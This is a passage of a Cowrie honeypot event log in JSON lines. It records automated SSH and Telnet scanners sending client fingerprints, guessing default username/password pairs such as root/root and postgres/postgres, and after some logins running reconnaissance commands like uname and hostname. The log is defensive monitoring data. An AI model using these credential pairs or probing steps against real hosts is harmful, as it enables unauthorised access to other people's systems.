{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:50:57.614426Z","src_ip":"212.227.235.229","session":"c56f58367962"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T02:50:58.742310Z","src_ip":"212.227.125.160","session":"3c52f6cc464d"}
{"eventid":"cowrie.session.closed","duration":4.2343456745147705,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:51:01.128881Z","src_ip":"212.227.125.160","session":"3c52f6cc464d"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456","message":"login attempt [developer/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:51:01.178349Z","src_ip":"212.227.235.229","session":"d61a8ea76196"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47922,"dst_ip":"1.2.3.4","dst_port":23,"session":"3b54fe3d21ca","protocol":"telnet","message":"New connection: 212.227.125.160:47922 (1.2.3.4:23) [session: 3b54fe3d21ca]","sensor":"my-vps","timestamp":"2025-08-31T02:51:01.442242Z"}
{"eventid":"cowrie.session.closed","duration":4.201149940490723,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:51:05.643324Z","src_ip":"212.227.125.160","session":"3b54fe3d21ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47928,"dst_ip":"1.2.3.4","dst_port":23,"session":"33d787df02c3","protocol":"telnet","message":"New connection: 212.227.125.160:47928 (1.2.3.4:23) [session: 33d787df02c3]","sensor":"my-vps","timestamp":"2025-08-31T02:51:05.957246Z"}
{"eventid":"cowrie.session.closed","duration":"97.9","message":"Connection lost after 97.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:51:06.432149Z","src_ip":"212.227.235.229","session":"d61a8ea76196"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:51:06.677729Z","src_ip":"212.227.125.160","session":"33d787df02c3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:51:06.694280Z","src_ip":"212.227.125.160","session":"33d787df02c3"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-31T02:51:07.040005Z","src_ip":"212.227.125.160","session":"33d787df02c3"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":46808,"dst_ip":"1.2.3.4","dst_port":22,"session":"e70822b371c9","protocol":"ssh","message":"New connection: 41.226.27.251:46808 (1.2.3.4:22) [session: e70822b371c9]","sensor":"my-vps","timestamp":"2025-08-31T02:51:08.991725Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:51:08.992443Z","src_ip":"41.226.27.251","session":"e70822b371c9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"2.3","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:51:08.993288Z","src_ip":"212.227.125.160","session":"33d787df02c3"}
{"eventid":"cowrie.session.closed","duration":3.039231777191162,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:51:08.996403Z","src_ip":"212.227.125.160","session":"33d787df02c3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:51:09.034838Z","src_ip":"41.226.27.251","session":"e70822b371c9"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres","message":"login attempt [postgres/postgres] failed","sensor":"my-vps","timestamp":"2025-08-31T02:51:09.164052Z","src_ip":"41.226.27.251","session":"e70822b371c9"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:51:10.387340Z","src_ip":"41.226.27.251","session":"e70822b371c9"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:51:11.419838Z","src_ip":"212.227.235.229","session":"c56f58367962"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38770,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3df96a86e20","protocol":"ssh","message":"New connection: 212.227.235.229:38770 (1.2.3.4:22) [session: e3df96a86e20]","sensor":"my-vps","timestamp":"2025-08-31T02:51:16.647628Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:51:17.429625Z","src_ip":"212.227.235.229","session":"e3df96a86e20"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:51:17.430534Z","src_ip":"212.227.235.229","session":"e3df96a86e20"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:51:21.590307Z","src_ip":"212.227.235.229","session":"c56f58367962"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:51:21.591137Z","src_ip":"212.227.235.229","session":"c56f58367962"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46856,"dst_ip":"1.2.3.4","dst_port":22,"session":"fadf17734bfa","protocol":"ssh","message":"New connection: 212.227.125.160:46856 (1.2.3.4:22) [session: fadf17734bfa]","sensor":"my-vps","timestamp":"2025-08-31T02:51:21.700452Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:51:22.880637Z","src_ip":"212.227.125.160","session":"fadf17734bfa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:51:22.881295Z","src_ip":"212.227.125.160","session":"fadf17734bfa"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"root123","message":"login attempt [ftptest/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:51:25.447622Z","src_ip":"212.227.235.229","session":"e3df96a86e20"}
{"eventid":"cowrie.session.closed","duration":"11.0","message":"Connection lost after 11.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:51:27.615092Z","src_ip":"212.227.235.229","session":"e3df96a86e20"}
{"eventid":"cowrie.login.success","username":"root","password":"sistema","message":"login attempt [root/sistema] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:51:28.725852Z","src_ip":"212.227.125.160","session":"fadf17734bfa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"7.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:51:28.833887Z","src_ip":"212.227.235.229","session":"c56f58367962"}
{"eventid":"cowrie.session.closed","duration":"43.8","message":"Connection lost after 43.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:51:28.835066Z","src_ip":"212.227.235.229","session":"c56f58367962"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":44314,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff68f2266d95","protocol":"ssh","message":"New connection: 41.226.27.251:44314 (1.2.3.4:22) [session: ff68f2266d95]","sensor":"my-vps","timestamp":"2025-08-31T02:51:29.270867Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:51:29.271844Z","src_ip":"41.226.27.251","session":"ff68f2266d95"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:51:29.315073Z","src_ip":"41.226.27.251","session":"ff68f2266d95"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"jenkins","message":"login attempt [jenkins/jenkins] failed","sensor":"my-vps","timestamp":"2025-08-31T02:51:29.446459Z","src_ip":"41.226.27.251","session":"ff68f2266d95"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:51:30.670215Z","src_ip":"41.226.27.251","session":"ff68f2266d95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:51:31.598984Z","src_ip":"212.227.125.160","session":"fadf17734bfa"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T02:51:31.599761Z","src_ip":"212.227.125.160","session":"fadf17734bfa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"2.5","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:51:34.074107Z","src_ip":"212.227.125.160","session":"fadf17734bfa"}
{"eventid":"cowrie.session.closed","duration":"12.4","message":"Connection lost after 12.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:51:34.075945Z","src_ip":"212.227.125.160","session":"fadf17734bfa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40842,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb10ff64e156","protocol":"ssh","message":"New connection: 212.227.125.160:40842 (1.2.3.4:22) [session: fb10ff64e156]","sensor":"my-vps","timestamp":"2025-08-31T02:51:34.767126Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57266,"dst_ip":"1.2.3.4","dst_port":22,"session":"a026bf8f2c99","protocol":"ssh","message":"New connection: 212.227.125.160:57266 (1.2.3.4:22) [session: a026bf8f2c99]","sensor":"my-vps","timestamp":"2025-08-31T02:51:38.790146Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:51:38.808119Z","src_ip":"212.227.125.160","session":"a026bf8f2c99"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:51:38.957545Z","src_ip":"212.227.125.160","session":"a026bf8f2c99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47746,"dst_ip":"1.2.3.4","dst_port":22,"session":"319f091b7d6a","protocol":"ssh","message":"New connection: 212.227.235.229:47746 (1.2.3.4:22) [session: 319f091b7d6a]","sensor":"my-vps","timestamp":"2025-08-31T02:51:39.290459Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:51:39.291496Z","src_ip":"212.227.235.229","session":"319f091b7d6a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:51:39.538169Z","src_ip":"212.227.235.229","session":"319f091b7d6a"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"root123","message":"login attempt [ftptest/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:51:40.266799Z","src_ip":"212.227.125.160","session":"a026bf8f2c99"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab","message":"login attempt [gitlab/gitlab] failed","sensor":"my-vps","timestamp":"2025-08-31T02:51:40.526922Z","src_ip":"212.227.235.229","session":"319f091b7d6a"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":44846,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bfad1108ae6","protocol":"ssh","message":"New connection: 201.148.180.50:44846 (1.2.3.4:22) [session: 9bfad1108ae6]","sensor":"my-vps","timestamp":"2025-08-31T02:51:40.982899Z"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:51:41.762563Z","src_ip":"212.227.125.160","session":"a026bf8f2c99"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:51:41.776175Z","src_ip":"212.227.235.229","session":"319f091b7d6a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:51:42.303448Z","src_ip":"201.148.180.50","session":"9bfad1108ae6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:51:42.304202Z","src_ip":"201.148.180.50","session":"9bfad1108ae6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:51:43.070126Z","src_ip":"212.227.125.160","session":"fb10ff64e156"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","e